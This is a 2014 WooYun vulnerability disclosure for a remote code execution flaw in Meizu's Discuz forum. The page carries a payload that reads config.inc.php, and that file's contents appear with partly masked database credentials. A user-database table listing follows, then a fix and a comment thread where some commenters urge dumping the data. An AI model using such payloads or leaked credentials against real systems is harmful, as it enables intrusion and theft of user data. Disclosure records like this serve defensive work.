当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(63) 关注此漏洞

缺陷编号: WooYun-2014-80884

漏洞标题: 魅族科技某分站存在远程代码执行漏洞(千万用户信息受影响)

相关厂商: 魅族科技

漏洞作者: 猪猪侠认证白帽子

提交时间: 2014-10-26 18:05

修复时间: 2014-12-01 10:06

公开时间: 2014-12-01 10:06

漏洞类型: 应用配置错误

危害等级: 高

自评Rank: 20

漏洞状态: 厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: 配置错误

9人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-10-26: 细节已通知厂商并且等待厂商处理中
2014-10-26: 厂商已经确认,细节仅向厂商公开
2014-11-05: 细节向核心白帽子及相关领域专家公开
2014-11-15: 细节向普通白帽子公开
2014-11-25: 细节向实习白帽子公开
2014-12-01: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

魅族科技某分站远程代码执行漏洞(千万用户信息受影响)

详细说明:

code 区域
影响网站:


http://forum.meizu.com/


Disucz ucenter 用户将近1000万



mask 区域
*****���*****

1.http://**.**.**/dzvul/sodb/19/sodb-2010-01.txt



meizu.png

漏洞证明:

meizu_cmd.png





cmd=echo readfile('./config.inc.php');

code 区域
<?php


//UTF8转码


/*


	[Discuz!] (C)2001-2006 Comsenz Inc.


	This is NOT a freeware, use is subject to license terms





	$RCSfile: config5.inc.php,v $


	$Revision: 1.9 $


	$Date: 2007/01/26 01:11:32 $ 


*/





// [CH] 以下变量请根据空间商提供的账号参数修改,如有疑问,请联系服务器提供商





	$dbhost = '192.168.**.**';			// 数据库服务器


	$dbuser = 'meizu_**bbs';			// 数据库用户名


	$dbpw = 'wdw5NR*****aAhW';				// 数据库密码


	$dbname = 'meizu_enbbs';			// 数据库名


	$pconnect = 0;				// 数据库持久连接 0=关闭, 1=打开





// [CH] 如您对 cookie 作用范围有特殊要求, 或论坛登录不正常, 请修改下面变量, 否则请保持默认





	$cookiepre = 'dZJ_';			// cookie 前缀


	$cookiedomain = ''; 			// cookie 作用域


	$cookiepath = '/';			// cookie 作用路径





// [CH] 论坛投入使用后不能修改的变量





	$tablepre = 'cdb_';   			// 表名前缀, 同一数据库安装多个论坛请修改此处





// [CH] 小心修改以下变量, 否则可能导致论坛无法正常使用





	$database = 'mysql';			// 论坛数据库类型,请勿修改


	$dbcharset = '';			// MySQL 字符集, 可选 'gbk', 'big5', 'utf8', 'latin1', 留空为按照论坛字符集设定





	$charset = 'utf-8';			// 论坛页面默认字符集, 可选 'gbk', 'big5', 'utf-8'


	$headercharset = 0;			// 强制论坛页面使用默认字符集,可避免部分服务器空间页面出现乱码,一般无需开启。 0=关闭 1= 开启





	$tplrefresh = 1;			// 论坛风格模板自动刷新开关 0=关闭, 1=打开。





	


// [CH] 论坛安全设置, 调整以下设置,可以增强论坛的安全性能和防御性能





	$adminemail = 'bbs@meizu.com';		// 系统管理员 Email





code 区域
[SHOW TABLES FROM `meizu_user`]


--------------------	-	


Tables_in_meizu_user	|	


--------------------	-	





TMP_VCH_02bea2a76c1f4f2491ae58252cbcfc71875	|	


TMP_VCH_0952588bd0904304a66e5db830d70853224	|	


TMP_VCH_131a1deb65bf4ab0b75dff6fa00c71c6923	|	


TMP_VCH_2ee3064b952241e694fcc5704dd37c286	|	


TMP_VCH_31ef36f285804af7a48bb939d7cc93a4544	|	


TMP_VCH_326901080e2d4cf8a85586e29f41f18065	|	


TMP_VCH_3cbe635e43be490296dbdc769d9e6774657	|	


TMP_VCH_3fcd7a5ee099423ba2383f459c8e0e98744	|	


TMP_VCH_530da630629843f6acd070b435bc7045572	|	


TMP_VCH_6fb938aba3ac4d34a3b156eefd6e7805262	|	


TMP_VCH_8a33e169514241ed9c8abbd76733b55a187	|	


TMP_VCH_8aae9628d37f44c785090f0a67e3a16f692	|	


TMP_VCH_9077238e556a4a068d54a5aee0b5113b846	|	


TMP_VCH_a28ce46669ef4c89b0eecd23c0cca09d778	|	


TMP_VCH_a58b7ec518b443048d0ffce7efdc3e0b311	|	


TMP_VCH_b84f960d9531447196fae440b2207791691	|	


TMP_VCH_bdfb1492eba54967a1c5ef6e09a44424884	|	


TMP_VCH_d02e1d2e1f8c4c819931ce72a4d3c571927	|	


TMP_VCH_d7b21c017ff4415cb8c584d524cf3498975	|	


T_APP_PRODUCT_ORDER	|	


T_AUTH_GRANT	|	


T_AUTH_OAUTH	|	


T_AUTH_RESOURCE	|	


T_AUTH_ROLE	|	


T_AUTH_ROLE_RESOURCE	|	


T_AUTH_USER	|	


T_BBS_DONATE_PERSON	|	


T_BBS_TITLE_INFO	|	


T_BS_BASEDATA	|	


T_BS_BASEDATA_LANG	|	


T_BS_BASEDATA_TYPE	|	


T_BS_GENERATECODE	|	


T_BS_GENERATECODE_LAST	|	


T_BS_IDENTITY	|	


T_BS_LOG	|	


T_BS_LOGINFAIL	|	


T_BS_LOGIN_URL	|	


T_BS_PARAMETER	|	


T_BS_PUSH_ROUTER	|	


T_BS_PWDKEY	|	


T_BS_REFERBD	|	


T_FNBL_CATEGORY	|	


T_UC_ACCOUNT	|	


T_UC_ACCOUNT_bak	|	


T_UC_BAL_0424	|	


T_UC_BAL_CHANGE_0424	|	


T_UC_BILL	|	


T_UC_BILL_LOSTDATA_0424	|	


T_UC_CHECKACCOUT_0424	|	


T_UC_DONATE_0424	|	


T_UC_LOGIN_VALIDCODE	|	


T_UC_MEMBERS_ACTIVE	|	


T_UC_MEMBERS_EXT	|	


T_UC_MEMBERS_MODIFY_ACTIVED_EMAIL	|	


T_UC_MEMBERS_VERIFICATION_CODE	|	


T_UC_MEMBER_DONATE	|	


T_UC_MEMBER_SN	|	


T_UC_MEMBER_SN_TMP	|	


T_UC_PAYMENT	|	


T_UC_PAYMENT_0424	|	


T_UC_PAYMENT_APPEAL_0424	|	


T_UC_PAYMENT_TEMP_0424	|	


T_UC_PAYMENT_tmp	|	


T_UC_TICKET	|	


T_UC_USER_BAL	|	


T_UC_VOUCHER_ENTRY_LOSTDATA	|	


T_UC_VOUCHER_ENTRY_tmp	|	


admin	|	


all_sn_1_tmp	|	


all_sn_2_tmp	|	


exists_sn_tmp	|	


exists_sn_tmp2	|	


imsi_card	|	


meizu_device	|	


no_exists_sn_tmp	|	


no_exists_sn_tmp2	|	


not_update_id_tmp	|	


online_meizu_device	|	


online_meizu_device_20140630_bak	|	


online_meizu_device_20140710_bak	|	


online_meizu_device_BAK_0711	|	


to_delete_id_tmp	|	


uc_admins	|	


uc_applications	|	


uc_badwords	|	


uc_create_members	|	


uc_domains	|	


uc_events	|	


uc_failedlogins	|	


uc_feeds	|	


uc_friends	|	


uc_mailqueue	|	


uc_memberfields	|	


uc_members	|	


uc_mergemembers	|	


uc_newpm	|	


uc_notelist	|	


uc_pm_indexes	|	


uc_pm_lists	|	


uc_pm_members	|	


uc_pm_messages_0	|	


uc_pm_messages_1	|	


uc_pm_messages_2	|	


uc_pm_messages_3	|	


uc_pm_messages_4	|	


uc_pm_messages_5	|	


uc_pm_messages_6	|	


uc_pm_messages_7	|	


uc_pm_messages_8	|	


uc_pm_messages_9	|	


uc_pms	|	


uc_protectedmembers	|	


uc_settings	|	


uc_sqlcache	|	


uc_tags	|	


uc_user_answer	|	


uc_user_setting	|	


uc_vars	|	


user_nickname_locus	|





修复方案:

更改php.ini

设置: request_order为GPC

版权声明:转载请注明来源 猪猪侠@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2014-10-26 18:35

厂商回复:

厂商正在处理

最新状态:

2014-12-01:此漏洞已修复。

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):
登陆后才能进行评分

评价

  1. 2014-10-26 18:06 | 郭斯特 ( 普通白帽子 | Rank:181 漏洞数:69 | GhostWin)
    1

    一楼?

    1# 回复此人
  2. 2014-10-26 18:08 | 老笨蛋 ( 路人 | Rank:29 漏洞数:8 | 老笨蛋一个)
    0

    地板……爽。

    2# 回复此人
  3. 2014-10-26 18:08 | 咖啡 ( 实习白帽子 | Rank:58 漏洞数:22 )
    0

    二楼?

    3# 回复此人
  4. 2014-10-26 18:11 | 冷静 ( 路人 | Rank:3 漏洞数:2 )
    0

    三楼?

    4# 回复此人
  5. 2014-10-26 18:16 | 安然意境 ( 普通白帽子 | Rank:194 漏洞数:83 | 暗室中很难找到黑猫,尤其当里面根本没猫的...)
    0

    五楼。

    5# 回复此人
  6. 2014-10-26 18:19 | YY-2012 ( 核心白帽子 | Rank:3774 漏洞数:722 | 意淫,是《红楼梦》原创的词汇,但后来演变...)
    0

    一亿九万四十五楼

    6# 回复此人
  7. 2014-10-26 18:24 | 子非海绵宝宝 认证白帽子 ( 核心白帽子 | Rank:1358 漏洞数:142 | 发扬海绵宝宝的精神! 你不是海绵宝宝,你怎...)
    0

    前排

    7# 回复此人
  8. 2014-10-26 18:36 | 子非海绵宝宝 认证白帽子 ( 核心白帽子 | Rank:1358 漏洞数:142 | 发扬海绵宝宝的精神! 你不是海绵宝宝,你怎...)
    0

    就5RANK?

    8# 回复此人
  9. 2014-10-26 18:40 | 猪猪侠 认证白帽子 ( 核心白帽子 | Rank:4696 漏洞数:358 | 你都有那么多超级棒棒糖了,还要自由干吗?)
    2

    @子非海绵宝宝 是的,如你所见,所有用户的信息+手机信息只值5RANK

    9# 回复此人
  10. 2014-10-26 18:43 | 子非海绵宝宝 认证白帽子 ( 核心白帽子 | Rank:1358 漏洞数:142 | 发扬海绵宝宝的精神! 你不是海绵宝宝,你怎...)
    1

    @猪猪侠 @魅族科技 其实我觉得并不是认为给的少 按照比例1:10其实也就100多块钱 并不是缺这个钱 而是白帽子的努力得不到肯定

    10# 回复此人
  11. 2014-10-26 18:54 | 咸鱼翻身 ( 普通白帽子 | Rank:622 漏洞数:119 )
    0

    下次拔裤子。。。。

    11# 回复此人
  12. 2014-10-26 20:42 | 写个七 ( 路人 | Rank:4 漏洞数:1 | 一点一点积累。)
    0

    自己利用可好? 魅族很坑人 屏幕坏了要600RMB修 操。 都可以换个新的了。

    12# 回复此人
  13. 2014-10-26 20:43 | 写个七 ( 路人 | Rank:4 漏洞数:1 | 一点一点积累。)
    0

    @猪猪侠 脱裤好吗 猪哥

    13# 回复此人
  14. 2014-10-26 21:40 | 酸奶、 ( 普通白帽子 | Rank:276 漏洞数:55 )
    0

    煤油飘过。不过说实话,rank的确少。

    14# 回复此人
  15. 2014-10-26 22:19 | 老笨蛋 ( 路人 | Rank:29 漏洞数:8 | 老笨蛋一个)
    0

    猪猪侠,光一次腚吧。总见裤子不见腚,干过瘾啊。

    15# 回复此人
  16. 2014-10-26 23:42 | px1624 ( 普通白帽子 | Rank:1108 漏洞数:189 | px1624)
    1

    @猪猪侠 5rank,50块。也就是说魅族几千万用户(应该是几千万吧,没去核实过)的数据才值50块,那么一条就是1W条数据大概1分钱左右,哈哈、、、

    16# 回复此人
  17. 2014-10-27 09:31 | Neeke ( 普通白帽子 | Rank:110 漏洞数:26 | 额滴歌神呀!)
    0

    是ROS吧?

    17# 回复此人
  18. 2014-10-27 11:37 | papaver ( 普通白帽子 | Rank:198 漏洞数:36 | 95后,高一学生一枚... 萌萌哒..)
    0

    哈哈 魅族果然 。。。

    18# 回复此人
  19. 2014-10-27 11:40 | 第四维度 ( 实习白帽子 | Rank:90 漏洞数:45 | 将点成线...)
    0

    安全的悲哀

    19# 回复此人
  20. 2014-10-27 19:01 | 雷锋 ( 路人 | Rank:12 漏洞数:2 | 承接:钻井,架工,木工,电工,水暖工,力...)
    1

    猪猪侠去小米了??

    20# 回复此人
  21. 2014-10-27 23:57 | 小火苗 ( 路人 | Rank:6 漏洞数:1 | 我是一只小火苗呀,春风吹又生呀...)
    0

    这厂商太浮夸。!

    21# 回复此人
  22. 2014-10-28 20:49 | leakless ( 路人 | Rank:6 漏洞数:3 | 今天我没吃药感觉自己萌萌哒~~)
    0

    下次再有这情况直接发裤子。。遇到这种厂商也是服了。。

    22# 回复此人
  23. 2014-10-28 20:49 | leakless ( 路人 | Rank:6 漏洞数:3 | 今天我没吃药感觉自己萌萌哒~~)
    0

    下次再有这情况直接发裤子。。遇到这种厂商也是服了。。

    23# 回复此人
  24. 2014-10-29 18:40 | Mixes ( 普通白帽子 | Rank:116 漏洞数:20 | :))
    0

    @猪猪侠 因为库被脱了.

    24# 回复此人
  25. 2014-11-08 22:59 | 刘海哥 ( 普通白帽子 | Rank:135 漏洞数:30 | 索要联系方式但不送礼物的厂商定义为无良厂...)
    0

    楼上真相?

    25# 回复此人
  26. 2014-11-26 10:19 | 黑吃黑 ( 普通白帽子 | Rank:165 漏洞数:32 | 不是因为看到了希望才去努力,而是努力了才...)
    1

    @猪猪侠 魅族真大方

    26# 回复此人
  27. 2014-12-01 11:03 | Woodee ( 路人 | 还没有发布任何漏洞 | 乌云路人甲,打脸pa pa pa)
    1

    魅族的节操呢??

    27# 回复此人
  28. 2014-12-01 16:07 | 【|→上善若水】 ( 普通白帽子 | Rank:127 漏洞数:25 | 【|→上善若水】)
    1

    @猪猪侠 大神,这个漏洞是什么原理呢?

    28# 回复此人
  29. 2014-12-07 13:00 | 廷廷 ( 路人 | Rank:0 漏洞数:1 | 有很强的好奇心,爱好广泛,求女女带走。。...)
    1

    @【|→上善若水】 http://www.80vul.com/dzvul/sodb/19/sodb-2010-01.txt 参照这个

    29# 回复此人
  30. 2014-12-07 22:54 | 【|→上善若水】 ( 普通白帽子 | Rank:127 漏洞数:25 | 【|→上善若水】)
    1

    @廷廷 thanks

    30# 回复此人
  31. 2014-12-22 13:11 | Cpt.Tony ( 路人 | Rank:0 漏洞数:1 | 兴趣)
    1

    QQ邮箱好评

    31# 回复此人
  32. 2015-06-25 16:42 | 魅族科技(乌云厂商)
    0

    @猪猪侠 非常感谢白帽子猪猪侠对魅族安全做出的贡献,我司安全部门刚刚成立不久,接管魅族厂商帐号之后,确实觉得之前的漏洞确认和评分不尽人意,特地申请了一批手机,一则感谢白帽子提供漏洞,二则反馈Wooyun社区,届时乌云管理员会联系你提供地址的,再次感谢您对魅族安全的关注。

    32# 回复此人
  33. 2015-06-25 17:03 | px1624 ( 普通白帽子 | Rank:1108 漏洞数:189 | px1624)
    0

    @魅族科技 俺有么有?心不黑,求一个魅蓝note2电信版。

    33# 回复此人
  34. 2015-06-25 17:12 | 魅族科技(乌云厂商)
    0

    @px1624 赞助了几台给乌云市场,敬请关注。

    34# 回复此人
  35. 2015-06-25 20:49 | px1624 ( 普通白帽子 | Rank:1108 漏洞数:189 | px1624)
    0

    @魅族科技 。。。还要买啊!?还以为是奖励给提交过魅族漏洞的白帽子呢

    35# 回复此人
  36. 2015-06-25 22:13 | he1renyagao ( 普通白帽子 | Rank:235 漏洞数:31 | 是金子总会发光,在还未发光之前,先磨磨)
    0

    @魅族科技 有点想去你们那边,能聊聊吗?

    36# 回复此人

登录后才能发表评论,请先 登录